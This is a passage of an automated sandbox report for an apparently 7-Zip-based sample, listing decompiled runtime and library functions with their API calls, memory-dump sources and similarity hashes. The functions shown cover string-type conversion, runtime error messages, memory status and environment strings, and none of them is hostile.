                                                                                  0x0041436b
                                                                                  0x00414324
                                                                                  0x00414327
                                                                                  0x0041432a
                                                                                  0x0041432c
                                                                                  0x0041432e
                                                                                  0x0041432f
                                                                                  0x00414336
                                                                                  0x00414339
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00414345
                                                                                  0x004143fd
                                                                                  0x00414400
                                                                                  0x00414404
                                                                                  0x00000000
                                                                                  0x00414404
                                                                                  0x0041434b
                                                                                  0x0041434e
                                                                                  0x00414358
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00414358
                                                                                  0x004143e3
                                                                                  0x004143e6
                                                                                  0x004143ea
                                                                                  0x004143ec
                                                                                  0x004143f0
                                                                                  0x004143f0
                                                                                  0x004143f5
                                                                                  0x00000000
                                                                                  0x004143f5
                                                                                  0x004143be
                                                                                  0x004143c1
                                                                                  0x004143c5
                                                                                  0x004143c7
                                                                                  0x004143cb
                                                                                  0x004143cb
                                                                                  0x004143d0
                                                                                  0x004143d0

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0041426E
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 0041481F
                                                                                    • Part of subcall function 00413E35: __EH_prolog.LIBCMT ref: 00413E3A
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 004145AC
                                                                                    • Part of subcall function 00413EF3: __EH_prolog.LIBCMT ref: 00413EF8
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00414716
                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0041473A
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00414765
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 004147E9
                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 0041483B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalDeleteSection$H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 267298877-0
                                                                                  • Opcode ID: 13d5c9578ffa9f24051f66a8e432b211ca4e975802d1602c744c2f562538c110
                                                                                  • Instruction ID: c24d3815df71a14f5bbf7c8d066a825158e8e708a592f674f2395a742420ece0
                                                                                  • Opcode Fuzzy Hash: 13d5c9578ffa9f24051f66a8e432b211ca4e975802d1602c744c2f562538c110
                                                                                  • Instruction Fuzzy Hash: 8C125A31E002199FDF14DF94C981AEEB7B5BF88314F14416AE529AB380D7789A81CF59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00472375 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 78%
                                                                                  			E00472375(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, char _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x47cd40);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x4938a4; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x493880; // 0x0
								_a20 = _t44;
							}
							_t13 =  &_a28; // 0x496224
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~( *_t13) & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E0046CC80(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E0046CCB0(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x493870; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x47cd24, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x47cd20, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x4938a4 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}





















                                                                                  0x00472378
                                                                                  0x0047237a
                                                                                  0x0047237f
                                                                                  0x0047238a
                                                                                  0x0047238b
                                                                                  0x00472392
                                                                                  0x00472398
                                                                                  0x0047239b
                                                                                  0x004723a4
                                                                                  0x004723e4
                                                                                  0x004723e7
                                                                                  0x00472410
                                                                                  0x00000000
                                                                                  0x00472416
                                                                                  0x00472419
                                                                                  0x0047241b
                                                                                  0x00472420
                                                                                  0x00472420
                                                                                  0x0047242b
                                                                                  0x00472430
                                                                                  0x0047243a
                                                                                  0x00472440
                                                                                  0x00472445
                                                                                  0x00000000
                                                                                  0x00472447
                                                                                  0x00472447
                                                                                  0x00472454
                                                                                  0x00472459
                                                                                  0x0047245c
                                                                                  0x0047245e
                                                                                  0x00472464
                                                                                  0x00472479
                                                                                  0x0047247f
                                                                                  0x00000000
                                                                                  0x00472481
                                                                                  0x00472490
                                                                                  0x00472498
                                                                                  0x00000000
                                                                                  0x0047249a
                                                                                  0x004724a2
                                                                                  0x004724a2
                                                                                  0x00472498
                                                                                  0x0047247f
                                                                                  0x00472445
                                                                                  0x004723e9
                                                                                  0x004723e9
                                                                                  0x004723ee
                                                                                  0x004723f0
                                                                                  0x004723f0
                                                                                  0x00472402
                                                                                  0x00472402
                                                                                  0x004723a6
                                                                                  0x004723a9
                                                                                  0x004723ac
                                                                                  0x004723bc
                                                                                  0x004723d6
                                                                                  0x004724aa
                                                                                  0x004724aa
                                                                                  0x004723dc
                                                                                  0x004723de
                                                                                  0x00000000
                                                                                  0x004723de
                                                                                  0x004723be
                                                                                  0x004723be
                                                                                  0x004723df
                                                                                  0x004723df
                                                                                  0x00000000
                                                                                  0x004723df
                                                                                  0x004723bc
                                                                                  0x004724b2
                                                                                  0x004724bd

                                                                                  APIs
                                                                                  • GetStringTypeW.KERNEL32(00000001,0047CD24,00000001,?,74CB70F0,00496224,?,?,00471FC7,?,?,?,00000000,00000001), ref: 004723B4
                                                                                  • GetStringTypeA.KERNEL32(00000000,00000001,0047CD20,00000001,?,?,00471FC7,?,?,?,00000000,00000001), ref: 004723CE
                                                                                  • GetStringTypeA.KERNEL32(?,?,?,?,00471FC7,74CB70F0,00496224,?,?,00471FC7,?,?,?,00000000,00000001), ref: 00472402
                                                                                  • MultiByteToWideChar.KERNEL32(?,$bI,?,?,00000000,00000000,74CB70F0,00496224,?,?,00471FC7,?,?,?,00000000,00000001), ref: 0047243A
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00471FC7,?), ref: 00472490
                                                                                  • GetStringTypeW.KERNEL32(?,?,00000000,00471FC7,?,?,?,?,?,?,00471FC7,?), ref: 004724A2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: StringType$ByteCharMultiWide
                                                                                  • String ID: $bI
                                                                                  • API String ID: 3852931651-2563688255
                                                                                  • Opcode ID: 5faa2e72cf23a552d0f70167b23892f61f4cda34b29eb4cb4140b725662a4e30
                                                                                  • Instruction ID: a5c6d82e9c342f5f8861e27a946ad25536d4888bca3c47b44a025a795350f61f
                                                                                  • Opcode Fuzzy Hash: 5faa2e72cf23a552d0f70167b23892f61f4cda34b29eb4cb4140b725662a4e30
                                                                                  • Instruction Fuzzy Hash: 57419E72600259BFCF209FA4DD85EEF3FB8FB09350F10882AF919D2250D37999508B99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00470C41 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 96%
                                                                                  			E00470C41(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x490378;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x490408) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x490378; // 0x5c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x493678; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x48e044 == 1) {
						_t16 = _t54 + 0x49037c; // 0x47cc5c
						_t56 = _t16;
						_t19 = L0046B400( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00471740( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(L0046B400( &_v424) + 1 > 0x3c) {
								_t49 = L0046B400( &_v424) +  &_v424 - 0x3b;
								E00471CB0(L0046B400( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00471740( &_v164, "Runtime Error!\n\nProgram: ");
							E00471750( &_v164, _t49);
							E00471750( &_v164, "\n\n");
							_t12 = _t54 + 0x49037c; // 0x47cc5c
							E00471750( &_v164,  *_t12);
							_t17 = E00471C24( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}













                                                                                  0x00470c41
                                                                                  0x00470c4a
                                                                                  0x00470c4d
                                                                                  0x00470c4f
                                                                                  0x00470c54
                                                                                  0x00470c58
                                                                                  0x00470c5b
                                                                                  0x00470c61
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00470c61
                                                                                  0x00470c66
                                                                                  0x00470c69
                                                                                  0x00470c6f
                                                                                  0x00470c75
                                                                                  0x00470c7d
                                                                                  0x00470d6e
                                                                                  0x00470d6e
                                                                                  0x00470d79
                                                                                  0x00470d8b
                                                                                  0x00470c94
                                                                                  0x00470c9a
                                                                                  0x00470cb6
                                                                                  0x00470cc4
                                                                                  0x00470cca
                                                                                  0x00470cd1
                                                                                  0x00470cd3
                                                                                  0x00470ce3
                                                                                  0x00470cfe
                                                                                  0x00470d06
                                                                                  0x00470d0b
                                                                                  0x00470d0b
                                                                                  0x00470d1a
                                                                                  0x00470d27
                                                                                  0x00470d38
                                                                                  0x00470d3d
                                                                                  0x00470d4a
                                                                                  0x00470d60
                                                                                  0x00470d68
                                                                                  0x00470c9a
                                                                                  0x00470c7d
                                                                                  0x00470d93

                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00470CAE
                                                                                  • GetStdHandle.KERNEL32(000000F4,0047CC5C,00000000,00000000,00000000,?), ref: 00470D84
                                                                                  • WriteFile.KERNEL32(00000000), ref: 00470D8B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$HandleModuleNameWrite
                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                  • API String ID: 3784150691-4022980321
                                                                                  • Opcode ID: 3f1414031e306f802f3caa4c7c29117252c4b502bfb9922d2e50e8356c28ed3a
                                                                                  • Instruction ID: 26f8d94228b957b8f636da331ac734a73308fccb95c236921b77b6dd9be393b7
                                                                                  • Opcode Fuzzy Hash: 3f1414031e306f802f3caa4c7c29117252c4b502bfb9922d2e50e8356c28ed3a
                                                                                  • Instruction Fuzzy Hash: F1313932601208AFEF35EBA4CD85FDE336CEB45304F10856BF54CE6251E678A9848B5A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040C609 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 61%
                                                                                  			E0040C609() {
				struct _MEMORYSTATUS _v36;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v100;
				_Unknown_base(*)()* _t15;
				intOrPtr _t17;
				intOrPtr _t19;
				void* _t27;

				_v100 = 0x40;
				_t15 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GlobalMemoryStatusEx");
				if(_t15 == 0) {
					L7:
					_v36.dwLength = 0x20;
					GlobalMemoryStatus( &_v36);
					_t17 = _v36.dwTotalVirtual;
					if(_t17 >= _v36.dwTotalPhys) {
						_t17 = _v36.dwTotalPhys;
					}
					return _t17;
				} else {
					_push( &_v100);
					if( *_t15() == 0) {
						goto L7;
					} else {
						_t19 = _v92;
						_t27 = _v56 - _v88;
						if(_t27 > 0 || _t27 >= 0 && _v60 >= _t19) {
							return _t19;
						} else {
							return _v60;
						}
					}
				}
			}













                                                                                  0x0040c619
                                                                                  0x0040c627
                                                                                  0x0040c62f
                                                                                  0x0040c657
                                                                                  0x0040c65a
                                                                                  0x0040c662
                                                                                  0x0040c668
                                                                                  0x0040c66e
                                                                                  0x0040c670
                                                                                  0x0040c670
                                                                                  0x0040c676
                                                                                  0x0040c631
                                                                                  0x0040c634
                                                                                  0x0040c639
                                                                                  0x00000000
                                                                                  0x0040c63b
                                                                                  0x0040c63e
                                                                                  0x0040c641
                                                                                  0x0040c644
                                                                                  0x0040c656
                                                                                  0x0040c64d
                                                                                  0x0040c651
                                                                                  0x0040c651
                                                                                  0x0040c644
                                                                                  0x0040c639

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040C620
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040C627
                                                                                  • GlobalMemoryStatus.KERNEL32 ref: 0040C662
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressGlobalHandleMemoryModuleProcStatus
                                                                                  • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                                                  • API String ID: 2450578220-802862622
                                                                                  • Opcode ID: e084be034f3929a9efab15a420d4320ad8e287069fa46d9bd79244de0d77a124
                                                                                  • Instruction ID: f023bf0e3df83ca1e7ee498ce2c1c416e3a88b1c0401ce8498900abd94d01139
                                                                                  • Opcode Fuzzy Hash: e084be034f3929a9efab15a420d4320ad8e287069fa46d9bd79244de0d77a124
                                                                                  • Instruction Fuzzy Hash: 7D014B70A0020DDBDF10EBE4D989A9EB7B5FB94348F244A25E405B7294D779E840CB9D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00470AD6 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00470AD6() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x493840; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = L0046BFC5(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E0046C5C0(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = L0046BFC5(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E0046C0FF(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x493840 = 2;
					goto L18;
				}
				 *0x493840 = 1;
				goto L6;
			}















                                                                                  0x00470ad8
                                                                                  0x00470ae7
                                                                                  0x00470ae9
                                                                                  0x00470aeb
                                                                                  0x00470aef
                                                                                  0x00470b27
                                                                                  0x00470bb1
                                                                                  0x00470bff
                                                                                  0x00000000
                                                                                  0x00470bff
                                                                                  0x00470bb3
                                                                                  0x00470bb5
                                                                                  0x00470bc3
                                                                                  0x00470bc5
                                                                                  0x00470bc7
                                                                                  0x00470bd3
                                                                                  0x00470bd6
                                                                                  0x00470bde
                                                                                  0x00470be3
                                                                                  0x00470bec
                                                                                  0x00470be5
                                                                                  0x00470be5
                                                                                  0x00470be5
                                                                                  0x00470bf5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00470bc9
                                                                                  0x00470bc9
                                                                                  0x00470bc9
                                                                                  0x00470bc9
                                                                                  0x00470bca
                                                                                  0x00470bce
                                                                                  0x00470bcf
                                                                                  0x00000000
                                                                                  0x00470bc9
                                                                                  0x00470bbd
                                                                                  0x00470bc1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00470bc1
                                                                                  0x00470b2d
                                                                                  0x00470b2f
                                                                                  0x00470b3d
                                                                                  0x00470b40
                                                                                  0x00470b42
                                                                                  0x00470b52
                                                                                  0x00470b5e
                                                                                  0x00470b65
                                                                                  0x00470b6b
                                                                                  0x00470b6f
                                                                                  0x00470b72
                                                                                  0x00470b7a
                                                                                  0x00470b7e
                                                                                  0x00470b8f
                                                                                  0x00470b95
                                                                                  0x00470b9b
                                                                                  0x00470b9b
                                                                                  0x00470b9f
                                                                                  0x00470b9f
                                                                                  0x00470b7e
                                                                                  0x00470ba4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00470b44
                                                                                  0x00470b44
                                                                                  0x00470b44
                                                                                  0x00470b45
                                                                                  0x00470b46
                                                                                  0x00470b4c
                                                                                  0x00470b4d
                                                                                  0x00000000
                                                                                  0x00470b44
                                                                                  0x00470b33
                                                                                  0x00470b37
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00470b37
                                                                                  0x00470af3
                                                                                  0x00470af7
                                                                                  0x00470b0b
                                                                                  0x00470b0f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00470b15
                                                                                  0x00000000
                                                                                  0x00470b15
                                                                                  0x00470af9
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470AF1
                                                                                  • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470B05
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470B31
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0046CFE1), ref: 00470B69
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0046CFE1), ref: 00470B8B
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,0046CFE1), ref: 00470BA4
                                                                                  • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470BB7
                                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00470BF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1823725401-0
                                                                                  • Opcode ID: c95006d6c82fd5b4b95bc722174a64074828fd68f564f103238a32f7180be584
                                                                                  • Instruction ID: 27e12e20c1ea4b212add3b7eab65f77fdbffab05a40932be5c7e7487a2d6895d
                                                                                  • Opcode Fuzzy Hash: c95006d6c82fd5b4b95bc722174a64074828fd68f564f103238a32f7180be584
                                                                                  • Instruction Fuzzy Hash: 9C3105B2406255DFE7307FF89C848BBB6DCEA4571C711453BF559C3200EA29BE8182AE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00406564 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 71%
                                                                                  			E00406564(void* __ecx) {
				void* _t15;
				void* _t18;
				void* _t29;
				void* _t31;

				L0046B890(0x473524, _t31);
				_push(__ecx);
				_t29 = __ecx;
				 *(_t31 - 0x10) = 0x490a88;
				EnterCriticalSection(0x490a88);
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				if( *((char*)(_t29 + 0x39)) == 0) {
					_t18 = _t29 + 8;
					if( *((char*)(_t31 + 0xc)) == 0) {
						_push("Compressing  ");
					} else {
						_push("Anti item    ");
					}
					E0040608D(_t18);
					_t13 =  *((intOrPtr*)(_t31 + 8));
					if( *((short*)( *((intOrPtr*)(_t31 + 8)))) == 0) {
						_t13 =  *0x48b344; // 0x48b388
					}
					E004060A5(_t18, _t13);
					if( *((char*)(_t29 + 0x38)) != 0) {
						E004060D4(_t18);
					}
					LeaveCriticalSection(0x490a88);
					_t15 = 0;
				} else {
					LeaveCriticalSection(0x490a88);
					_t15 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
				return _t15;
			}







                                                                                  0x00406569
                                                                                  0x0040656e
                                                                                  0x00406576
                                                                                  0x00406579
                                                                                  0x0040657c
                                                                                  0x00406582
                                                                                  0x0040658a
                                                                                  0x0040659c
                                                                                  0x0040659f
                                                                                  0x004065a8
                                                                                  0x004065a1
                                                                                  0x004065a1
                                                                                  0x004065a1
                                                                                  0x004065af
                                                                                  0x004065b4
                                                                                  0x004065bb
                                                                                  0x004065bd
                                                                                  0x004065bd
                                                                                  0x004065c5
                                                                                  0x004065ce
                                                                                  0x004065d2
                                                                                  0x004065d2
                                                                                  0x004065d8
                                                                                  0x004065de
                                                                                  0x0040658c
                                                                                  0x0040658d
                                                                                  0x00406593
                                                                                  0x00406593
                                                                                  0x004065e6
                                                                                  0x004065ee

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00406569
